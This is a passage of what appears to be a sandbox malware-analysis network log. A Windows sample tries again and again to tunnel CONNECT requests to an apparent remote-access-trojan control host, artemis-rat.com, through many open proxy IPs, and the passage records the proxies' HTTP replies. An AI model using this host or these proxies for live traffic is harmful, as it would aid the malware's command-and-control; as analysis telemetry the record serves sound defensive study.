                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:07.881818056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:31.881844997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:19.897501945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              645192.168.2.44973450.63.12.33507817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.704469919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.866261005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.866704941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.866616964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:43.866548061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              646192.168.2.45208038.162.30.6531287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.705658913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.116269112 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              647192.168.2.45192591.148.127.16280807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.792263031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              648192.168.2.451854185.208.183.12231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.792551994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              649192.168.2.452097167.99.124.118807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.792676926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.350605011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.070065022 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.554207087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.366517067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.164716959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.054328918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.757128954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.069299936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              650192.168.2.45194447.106.112.20780817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.793008089 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.142862082 CET767INHTTP/1.1 403 Forbidden
                                              Server: Beaver
                                              Cache-Control: no-cache
                                              Content-Type: text/html
                                              Content-Length: 635
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                              Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                              Mar 11, 2024 08:37:20.143764019 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.20.1
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              651192.168.2.45193843.255.113.232807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.793018103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.553881884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.663402081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.741622925 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.054153919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:32.362620115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              652192.168.2.452121162.243.102.20797647284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.793176889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              653192.168.2.451855103.190.54.14180807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.796423912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              654192.168.2.45201618.134.236.23131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.796690941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.090332985 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              655192.168.2.45199251.89.173.40447197284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.798290014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.553879976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.553919077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.366101980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              656192.168.2.45220666.29.129.53144647284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.798294067 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.958559990 CET24INHTTP/1.1 403 #string


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              657192.168.2.451985164.132.170.100807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.800050974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.459968090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.569663048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.554155111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.848150969 CET536INHTTP/1.1 500 Internal Server Error
                                              Date: Mon, 11 Mar 2024 07:37:25 GMT
                                              Server: Apache/2.4.29 (Ubuntu)
                                              Content-Length: 613
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of
                                              Mar 11, 2024 08:37:25.848156929 CET269INData Raw: 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f
                                              Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at artemis-rat.com Port 443


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              658192.168.2.45215892.204.135.37550197284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.801722050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.366380930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.092226982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.554089069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:25.257493973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:28.054152966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.762567043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.069576979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:46.663137913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              659192.168.2.451918103.127.1.130807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.801722050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              660192.168.2.45208454.248.238.110807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:19.802150965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.068065882 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0
